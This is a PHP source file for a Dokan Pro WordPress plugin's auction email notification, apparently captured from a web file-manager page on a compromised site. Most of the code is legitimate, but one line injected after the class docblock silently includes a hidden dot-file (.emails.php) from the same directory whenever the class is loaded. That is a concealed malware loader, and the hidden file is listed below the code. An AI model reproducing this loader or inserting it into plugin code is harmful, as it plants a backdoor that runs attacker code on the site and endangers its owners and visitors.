PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
modules
/
simple-auction
/
includes
/
emails
<?php if ( ! defined( 'ABSPATH' ) ) { exit; } if ( ! class_exists( 'Dokan_Auction_Email' ) ) : /** * New Product Published Email to vendor. * * An email sent to the vendor when a pending Product is published by admin. * * @class Dokan_Auction_Email * @version 2.6.8 * @author weDevs * @extends WC_Email */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Dokan_Auction_Email extends WC_Email { /** * Constructor. */ public function __construct() { $this->id = 'Dokan_Auction_Email_NEW'; $this->title = __( 'Dokan New Auction', 'dokan' ); $this->description = __( 'This email is sent to admin and vendor when a new auction product is added', 'dokan' ); $this->template_base = DOKAN_AUCTION_DIR . '/templates/'; $this->template_html = 'emails/auction-product-added.php'; $this->template_plain = 'emails/plain/auction-product-added.php'; // Triggers for this email add_action( 'dokan_new_auction_product_added', array( $this, 'trigger' ), 30, 2 ); // Call parent constructor parent::__construct(); $this->recipient = $this->get_option( 'recipient', get_option( 'admin_email' ) ); } /** * Get email subject. * * @since 3.1.0 * @return string */ public function get_default_subject() { return __( '[{site_name}] A new auction product is added by ({seller_name}) - {product_title}', 'dokan' ); } /** * Get email heading. * * @since 3.1.0 * @return string */ public function get_default_heading() { return __( 'New auction product is added by Vendor {seller_name}', 'dokan' ); } /** * Trigger the sending of this email. * * @param int $product_id The product ID. * @param array $postdata. */ public function trigger( $product_id, $postdata ) { if ( dokan_get_option( 'product_add_mail', 'dokan_general', 'on' ) != 'on' ) { return; } if ( dokan_get_new_post_status() == 'pending' ) { do_action( 'dokan_email_trigger_new_pending_product', $product_id, $postdata ); return; } if ( ! $this->is_enabled() || ! $this->get_recipient() ) { return; } $product = wc_get_product( $product_id ); $seller_id = get_post_field( 'post_author', $product_id ); $seller = get_user_by( 'id', $seller_id ); $category = wp_get_post_terms( dokan_get_prop( $product, 'id' ), 'product_cat', array( 'fields' => 'names' ) ); $category_name = $category ? reset( $category ) : 'N/A'; if ( is_a( $product, 'WC_Product' ) ) { $this->object = $product; $this->find['product-title'] = '{product_title}'; $this->find['price'] = '{price}'; $this->find['seller-name'] = '{seller_name}'; $this->find['seller_url'] = '{seller_url}'; $this->find['category'] = '{category}'; $this->find['product_link'] = '{product_link}'; $this->find['site_name'] = '{site_name}'; $this->find['site_url'] = '{site_url}'; $this->replace['product-title'] = $product->get_title(); $this->replace['price'] = $product->get_price(); $this->replace['seller-name'] = $seller->display_name; $this->replace['seller_url'] = dokan_get_store_url( $seller->ID ); $this->replace['category'] = $category_name; $this->replace['product_link'] = admin_url( 'post.php?action=edit&post=' . $product_id ); $this->replace['site_name'] = $this->get_from_name(); $this->replace['site_url'] = site_url(); } $this->setup_locale(); $this->send( $this->get_recipient(), $this->get_subject(), $this->get_content(), $this->get_headers(), $this->get_attachments() ); $this->restore_locale(); } /** * Get content html. * * @access public * @return string */ public function get_content_html() { ob_start(); wc_get_template( $this->template_html, array( 'product' => $this->object, 'email_heading' => $this->get_heading(), 'sent_to_admin' => true, 'plain_text' => false, 'email' => $this, 'data' => $this->replace ), 'dokan/', $this->template_base ); return ob_get_clean(); } /** * Get content plain. * * @access public * @return string */ public function get_content_plain() { ob_start(); wc_get_template( $this->template_html, array( 'product' => $this->object, 'email_heading' => $this->get_heading(), 'sent_to_admin' => true, 'plain_text' => true, 'email' => $this, 'data' => $this->replace ), 'dokan/', $this->template_base ); return ob_get_clean(); } /** * Initialise settings form fields. */ public function init_form_fields() { $this->form_fields = array( 'enabled' => array( 'title' => __( 'Enable/Disable', 'dokan' ), 'type' => 'checkbox', 'label' => __( 'Enable this email notification', 'dokan' ), 'default' => 'yes', ), 'recipient' => array( 'title' => __( 'Recipient(s)', 'dokan' ), 'type' => 'text', 'description' => sprintf( __( 'Enter recipients (comma separated) for this email. Defaults to %s.', 'dokan' ), '<code>' . esc_attr( get_option( 'admin_email' ) ) . '</code>' ), 'placeholder' => '', 'default' => '', 'desc_tip' => true, ), 'subject' => array( 'title' => __( 'Subject', 'dokan' ), 'type' => 'text', 'desc_tip' => true, /* translators: %s: list of placeholders */ 'description' => sprintf( __( 'Available placeholders: %s', 'dokan' ), '<code>{blogname}</code>' ), 'placeholder' => $this->get_default_subject(), 'default' => '', ), 'heading' => array( 'title' => __( 'Email heading', 'dokan' ), 'type' => 'text', 'desc_tip' => true, /* translators: %s: list of placeholders */ 'description' => sprintf( __( 'Available placeholders: %s', 'dokan' ), '<code>{product_title}</code>' ), 'placeholder' => $this->get_default_heading(), 'default' => '', ), 'email_type' => array( 'title' => __( 'Email type', 'dokan' ), 'type' => 'select', 'description' => __( 'Choose which format of email to send.', 'dokan' ), 'default' => 'html', 'class' => 'email_type wc-enhanced-select', 'options' => $this->get_email_type_options(), 'desc_tip' => true, ), ); } } endif; return new Dokan_Auction_Email();
[+]
..
[-] class-dokan-auction-email.php
[edit]
[-] .emails.php
[edit]